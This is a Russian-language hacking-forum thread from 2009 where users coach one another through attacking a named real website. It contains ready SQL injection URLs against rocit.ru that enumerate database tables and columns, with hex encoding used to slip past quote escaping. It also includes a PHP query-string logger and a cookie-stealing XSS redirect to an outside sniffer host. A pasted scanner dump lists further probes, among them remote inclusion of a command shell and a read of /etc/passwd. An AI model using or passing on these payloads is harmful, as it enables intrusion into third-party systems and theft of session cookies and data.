ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.06.2009, 15:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x726f636974--
мэджики включены |
|
|
15.06.2009, 15:34
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
jecka3000 почитай статьи, любые
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=0x726 F636974--
wildshaman я же писал про набивание постов , а ты сказал, что ничего такого не будет.
|
|
|
|
15.06.2009, 15:36
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от jokester
[B
wildshaman[/B] я же писал про набивание постов , а ты сказал, что ничего такого не будет.
Лично я не набиваю, (я не стремлюсь ни в РОА, ни в МОА, ни выше) а просто помогаю человеку.
Теперь любая помощь в тематических разделах считается набиванием постов?
|
|
|
|
15.06.2009, 15:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от main()
Помоги плиз изминитиь тот скрипт чтобы он через
QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
PHP код:
fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n")
Запись квери_стринг. Редирект примерно такой
Код:
<script>location="http://site.ru/snifffer.php?"+document.cookie</script>
|
|
|
|
15.06.2009, 15:48
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
jokester, я достиг такого же результаты с помощью LIMIT 28,1 -- Именн тут база мне ответила user
зато на такой запрос http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns+where+table_name=%27us er%27 жу ничего не выводит...
|
|
|
|
15.06.2009, 15:50
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
jecka3000
Я- же написал, почитай любую статью. mailbrush тебе написал, включены маджики, тоеть кавычки экранируются.
Переводи в хекс
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns+where+table_name=0x757 36572
Сообщение от wildshaman
Теперь любая помощь в тематических разделах считается набиванием постов?
Дружище, не нужно переиначивать. Сообщения не по теме - это набивание постов, а попросту оффтоп.
Применительно к данному случаю:
Человек делает выборку из конкретной базы, а ты ему даёшь запрос выборки из всех баз. Он и без тебя , думаю , с этим справлялся. Отсюда вывод: совет не в тему , стало-быть оффтоп.
|
|
|
|
15.06.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572
Юзай хекс, читай статьи. Тебе же линк дали! |
|
|
|
15.06.2009, 15:52
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
Провел на форуме:
23709
Репутация:
6
|
|
Сообщение от mailbrush
PHP код:
fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n")
Запись квери_стринг. Редирект примерно такой
Код:
<script>location="http://site.ru/snifffer.php?"+document.cookie</script>
Спасибо огромное. поставте ктонить ему +
Я новичок могу только 0
|
|
|
|
15.06.2009, 17:05
|
|
Новичок
Регистрация: 10.06.2009
Сообщений: 4
Провел на форуме:
4993
Репутация:
0
|
|
Кто нибудь покажите где здесь уязвимость?
Найдено: /?PageServices
Найдено: /?wp-cs-dump
Найдено: /?wp-html-rend
Найдено: /?wp-stop-ver
Найдено: /?wp-uncheckout
Найдено: /?wp-usr-prop
Найдено: /?wp-ver-diff
Найдено: /?wp-verify-link
Найдено: /?wp-ver-info
Найдено: /index.php?IDAdmin=test
Найдено: /index.php?base=test
Найдено: /index.php?SqlQuery=test
Найдено: index.php?tampon=test
Найдено: /index.php?name=Members_List&letter=All&sortby=pass
Найдено: /index.php?name=Members_List&letter=All&sortby=uid
Найдено: /server-status/
Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=? &ratinghost_name=?&rating=999999999999999999999 99
Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9
Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: index.php?a=lostpw&set=1&session_id=`
Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: /index.php?a=lostpw&set=1&session_id=`
Найдено: /?page='
Найдено: /?page=shop/cart&func=cartAdd&product_id='
Найдено: /?page=shop/browse&category_id=&offset='
Найдено: /?page=admin/index&GulfTech=">
Найдено: /index.php?option=content&task=view&id='
i vot eshe
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|
|
|
|
15.06.2009, 17:08
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
а полный линк не хошь выложить?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
